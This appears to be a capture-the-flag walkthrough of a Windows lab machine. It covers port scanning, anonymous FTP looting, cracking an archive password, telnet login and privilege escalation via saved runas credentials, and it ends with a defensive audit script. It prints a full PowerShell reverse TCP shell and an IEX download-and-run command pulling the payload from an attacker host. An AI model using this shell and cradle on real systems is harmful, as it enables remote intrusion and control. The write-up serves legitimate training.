Machine IP: 10.10.10.98 - Windows
- NMAP: All TCP ports
- NMAP: Open ports Service Version
- FTP Anonymous Login
- Telnet Anonymous Login
- Website
▶ nmap -Pn -sS -p- 10.10.10.98 -T4 --min-rate 5000 -oN nmap.surface
Nmap scan report for 10.10.10.98
Host is up (0.19s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 26.68 seconds
▶ nmap -sC -sV -p 21,23,80 10.10.10.98 -T4 --min-rate 5000 -oN nmap.deep
Nmap scan report for 10.10.10.98
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.59 seconds
- Telnet login failed.
▶ telnet 10.10.10.98
- Log in to FTP; anonymous login is allowed.
▶ ftp 10.10.10.98
- Download all directories and files found in FTP.
▶ wget -m --no-passive ftp://anonymous:[email protected]
- Access File
▶ 7z x Access\ Control.zip
- Technical Information
▶ 7z l -slt Access\ Control.zip
- Look into the file
▶ strings backup.mdb
- Extract Information
▶ mdb-tables backup.mdb | grep --color=auto user
▶ mdb-export backup.mdb auth_user
▶ 7z x Access\ Control.zip
password: access4u@security
- Check the file.
▶ file Access\ Control.pst
File Type: Microsoft Outlook Personal Storage
- Convert the .pst file to an .mbox file.
▶ readpst Access\ Control.pst
- Read emails
▶ less Access\ Control.mbox
Username: security
Password: 4Cc3ssC0ntr0ller
- Login using found credentials.
▶ telnet 10.10.10.98
- Modify and upload the nishang TCP shell: /opt/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1
Nishang PowerShell One-Line Reverse TCP Shell
$client = New-Object System.Net.Sockets.TCPClient('<attacker_IP>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
▶ python -m http.server
▶ nc -nlvvp 9001
C:\Users\security\Desktop>powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.24:8000/Invoke-PowerShellTcpOneLine.ps1')"
- Check if any stored credentials exist.
PS C:\Users\security\Desktop> cmdkey /list
The commands below are used to enumerate all the accessible shortcut (.lnk) files on the system, and examine them for the presence of the "runas" command.
C:\Users\security\Desktop> Get-ChildItem "C:\" *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txt
C:\Users\security\Desktop> ForEach($file in gc .\shortcuts.txt) {Write-Output $file; gc $file | Select-String runas}
The results above show that the ZKAccess shortcut on the Public Desktop has been configured using the runas command.
The Desktop folder is not immediately visible since it is a hidden folder, but it can still be traversed and its contents listed. The folder is accessible to the built-in "NT AUTHORITY\INTERACTIVE" group. Users who log in "interactively", whether locally or over a Remote Desktop or telnet session, will have the Interactive SID in their access token.
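As an added defender-side audit (not part of the original notes), the script below reports the two conditions found above on a host: saved credentials listed by cmdkey, and shortcuts whose target invokes runas, flagging any that carry the /savecred argument. It assumes it is run from an elevated PowerShell on the Windows host being reviewed, and it reads shortcut targets through the WScript.Shell COM object rather than grepping raw .lnk bytes.

```powershell
# Hypothetical audit script (assumption: run elevated on the host under review).

function Get-StoredCredentialEntries {
    # Parse the text output of `cmdkey /list` into one object per saved credential.
    $entries = @()
    $current = $null
    foreach ($line in (cmdkey /list)) {
        if ($line -match '^\s*Target:\s*(.+)$') {
            $current = [pscustomobject]@{ Target = $Matches[1].Trim(); User = $null }
            $entries += $current
        } elseif ($line -match '^\s*User:\s*(.+)$' -and $current) {
            # pscustomobject is a reference type, so the array element is updated too.
            $current.User = $Matches[1].Trim()
        }
    }
    return $entries
}

function Find-RunAsShortcuts {
    param([string]$Root = 'C:\')
    $wsh = New-Object -ComObject WScript.Shell
    # -Force includes hidden folders such as C:\Users\Public\Desktop.
    Get-ChildItem -Path $Root -Filter *.lnk -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sc  = $wsh.CreateShortcut($_.FullName)
            $cmd = "$($sc.TargetPath) $($sc.Arguments)"
            if ($cmd -match 'runas(\.exe)?') {
                [pscustomobject]@{
                    Shortcut   = $_.FullName
                    Command    = $cmd
                    SavesCreds = [bool]($cmd -match '/savecred')   # stored-credential use
                }
            }
        }
}

$creds = Get-StoredCredentialEntries
if ($creds) {
    Write-Host "Stored credentials present (cmdkey /list):"
    $creds | Format-Table -AutoSize
}
$hits = @(Find-RunAsShortcuts)
if ($hits.Count -gt 0) {
    Write-Host "Shortcuts invoking runas (review any with SavesCreds = True):"
    $hits | Format-Table -AutoSize
} else {
    Write-Host "No runas shortcuts found under C:\."
}
```

A shortcut reported with SavesCreds = True runs its target with whatever account is saved in the credential store, so remove the saved credential with `cmdkey /delete` or rework the shortcut to not rely on stored credentials.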